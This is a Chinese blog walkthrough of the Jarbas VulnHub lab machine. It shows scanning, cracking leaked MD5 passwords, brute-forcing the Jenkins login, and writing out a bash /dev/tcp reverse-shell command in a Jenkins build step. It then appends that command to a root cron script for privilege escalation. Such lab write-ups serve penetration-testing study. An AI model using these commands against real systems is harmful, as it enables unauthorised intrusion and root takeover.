红队渗透靶场之Jarbas靶场(超详细)

已于 2022-11-26 13:10:32 修改
阅读量1.2k 收藏 3
点赞数 2
分类专栏: 靶场 文章标签: 网络安全 web安全 网络攻击模型
于 2022-11-26 11:55:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/128050103
版权

靶场考察点

1.Jenkis平台的漏洞利用

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成


2.contrab提权

在LINUX系统中的/etc/contrab文件存放着系统定时任务, 若该文件的某些定时任务指定由root用户执行, 那么这将是一个可提权点


3.登录爆破

使用burpsuite对网站后台登录进行爆破


靶场搭建

Jarbas靶场下载地址: https://download.vulnhub.com/jarbas/Jarbas.zip


渗透步骤

信息收集

1.确定靶机ip

扫描C段ip的存活主机: nmap -sn 192.168.47.0/24, 确定目标主机的IP为192.168.47.156

image-20221124230218824


2.端口扫描

分别使用tcp和udp扫描目标主机的开放端口, 显示开放的端口有228033068080

nmap -p- 192.168.47.156
nmap -sU -V -p22,80,3306,8080 192.168.47.156

image-20221124233435735

image-20221124233440334


nmap使用web漏扫脚本进行扫描, 扫描结果并不太理想, 显示在8080端口处有一个robots.txt

nmap --script=vuln -p21,22,80,3306 192.168.47.156

image-20221124233935822


访问robots.txt, 页面信息为"我们不想机器人去点击’建立’连接", 作者不想"build"被点击, 那么这个"build"后续很可能会出现且可利用

image-20221125090817640


访问http://192.168.47.156:8080, 显示登录页面, 可用于后续的爆破

image-20221125093938352


3.目录爆破

对http://192.168.47.156:80进行目录爆破, 爆出access.html

python3 dirsearch.py -u http://192.168.47.156 -x 403

image-20221125091907048


访问http://192.168.47.156:80/access.html, 页面显示三段未加密字符对应MD5加密字符串,依照以往的经验这可能是用户的账号及密码

经过在线网站的破解后, 密码字符串分别为italiavipsumariana, 最终账号对应密码如下所示:

  • tiago- > italia
  • trindade -> vipus
  • eder -> mariana

1

1


使用上述的账号密码尝试登录, 全部登录失败, 后续尝试使用burpsuite打乱顺序进行爆破

1


Web渗透

1.登录爆破

使用burpsuite进行爆破, 攻击类型选择Clusterbomb, 爆破参数分别是j_usernamej_password, 爆破的字典填写上述用户的账号密码

1

1

1


从响应长度可判断出eder/marianaeder/vipsu都可能为正确的账号密码, 经过登录尝试后, 确定后者才是正确的账号密码

由后台页面可知, 这是一个Jenkins平台, 这就要考察我们对该平台漏洞利用的了解

image-20221125155317577

image-20221125155433328


2.Jenkins远程命令执行反弹shell

在Jenkins平台新建一个任务 动画


在构建栏处发现一处能够远程命令执行的地方, 选择Execute shell, 随后输入/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1, 该命令的作用是反弹目标主机的shell, 然后点击应用加保存

1

1


在kali监听本机的4444端口来接收反弹Shell: nc -lvp 4444, 随后点击立即构建触发上述设置的远程命令,后续在kali收到反弹的shell

通常以这种方式获取的反弹shell, 我们称之为非交互式shell

  • 交互式shell: shell等待你的输入并且执行你提交的命令, 这种模式也是大多数用户非常熟悉的
  • 非交互式shell: shell不与你进行交互,而是读取存放在文件中的命令,并且执行它们, 当它读到文件的结尾,shell也就终止了

1

image-20221125211409283


系统提权

1.收集当前用户信息

查看当前用户: whoami, 显示当前用户为jenkins

image-20221125221304286


查看当前用户权限: sudo -l, 结果显示没有任何权限

image-20221125221342646


2.crontab提权

查看系统定时任务: cat /etc/crontab, 发现有一个任务使用root用户执行shell脚本

查看shell脚本的内容: cat /etc/script/CleaningScript.sh, 发现这是一个删除日志的脚本

image-20221125222821487

image-20221125223338183


将反弹Shell的命令写入脚本文件, 这样一来就能获取root权限的反弹shell了

echo "/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1" >> /etc/script/CleaningScript.sh

image-20221125223530489


重新建立nc监听, 过5分钟后就能接收到反弹的root权限shell

image-20221125224814118


获取flag.txt

image-20221126000715869

Henry404s
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透打点工具-FindUpload
03-07
FindUpload是一款打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 596
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
jarbas靶场渗透笔记
m0_60571990的博客
03-10 351
jarbas靶场渗透笔记
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 265
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1232
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
【学渗透靶机 ——JARBAS
jieli0901227的博客
04-05 236
通过nmap 扫描结果发现有两个IP,192.168.241.140 为 KALI。这个页面中加密字符串,通过kali工具判断有可能是MD5,passwd 能够查看,而shadow 文件没有查看权限。尝试访问/etcpasswd 和/etc/shadow。使用burp 抓包后台登录界面进行尝试爆破。发现80端口有两个页面,而8080没有。(2)还发现构造项目中可以命令执行。写入反弹shell ,保存后。访问index为默认页面,但是反弹shell没有成功。成功拿到webshell。计划任务中脚本有写权限,
近源渗透视角WiFi.pdf
03-24
无线网络已经事实上成为了企业移动化办公的重 要基础设施,但由于普遍缺乏有效的管理,部署与 使用人员的安全意识和专业知识的不足,导致AP分 布混乱,设备安全性脆弱,无线网络也越来越多的 成为黑客入侵企业内网...
综合渗透框架SatanSword
01-14
web指纹识别,集成whatweb及wappalyzer所有指纹及自己收集的web服务器指纹1839条+cms指纹1936条。 漏洞PoC检测,提供360+PoC检测脚本内置在数据库中,同时支持漏洞查询和代码查看及一键批量检测功能。...
渗透测试//src全方位测试字典
09-01
这是安全测试人员的伴侣。它是安全评估期间使用的多种类型的列表的集合,收集在一个位置。列表类型包括用户名、密码、...目标是使安全测试人员能够将此存储库拉到新的测试框中,并可以访问可能需要的每种类型的列表。
靶机精讲之JARBAS
m0_63285023的博客
04-05 456
靶机精讲之JARBAS
渗透靶场Jarbas
m0_56190544的博客
07-09 500
完整的解析了vulnhub靶场中的Jarbas渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
JARBAS - VulnHub(漏洞靶场渗透测试)
Start C的博客
12-06 305
VulnHub的一个靶场
打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 1375
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub-Jarbas-wp
yutianovo的博客
09-04 286
靶机描述 http://blog.yutian233.xyz/index.php/ If you want to keep your hacking studies, please try out this machine! Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s. Objective: Get root shell! 下载 https://www.vulnhub.com/entr
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8232
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 606
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 931
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
蓝对抗 网络安全 网络安全蓝对抗演练
最新发布
2401_84488537的博客
05-15 1093
在军事领域,演习是专指军进行大规模的实兵演习,演习中通常分为军、蓝军,演习多以军守、蓝军进攻为主。类似于军事领域的蓝军对抗,网络安全中,蓝军对抗则是一方扮演黑客(蓝军),一方扮演防御者(军)。在国外的话,进行渗透攻击的团经常称做,在国内称为蓝实际上应该是比较准确的叫法。蓝对抗一定要区别于渗透测试,渗透测试这是每个公司的标配。蓝对抗的价值在于挖掘渗透测试不关注的漏洞或者渗透测试无法覆盖的点,并且持续的对抗,不断帮助业务提升安全能力,完善自己的安全防御。
CTF如何学习?
小司机的奥拓
05-14 929
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
vulhub 多层渗透靶场是哪个
09-06
vulhub 多层渗透靶场是一个基于 Docker 的漏洞复现与渗透测试环境。该靶场提供了丰富多样的漏洞环境,供安全研究人员、渗透测试人员和学习者进行实践和学习。 vulhub 多层渗透靶场包括了很多不同的漏洞环境,每个环境都以 Docker 镜像的形式提供。通过使用 Docker 技术,可以方便地创建、启动和停止不同的漏洞环境,实现了环境的分离和隔离。 在 vulhub 多层渗透靶场中,可以找到包括 Web 漏洞、网络漏洞、服务器漏洞等多个层次的漏洞环境。这些漏洞环境包括但不限于:WebGoat、DVWA、Metasploitable、bWAPP 等。每个环境都模拟了真实场景中常见的漏洞,并提供了相应的解题指南,便于学习者进行漏洞的渗透测试和复现。 通过使用 vulhub 多层渗透靶场,学习者可以深入了解各种类型的漏洞,学习漏洞的攻击方法和防御策略。这对于提高网络安全意识,提升渗透测试能力和技能非常有帮助。 总之,vulhub 多层渗透靶场提供了一个实践的平台,帮助学习者更好地了解和学习各种漏洞,并提供了相应的指导,帮助学习者掌握渗透测试和网络安全知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值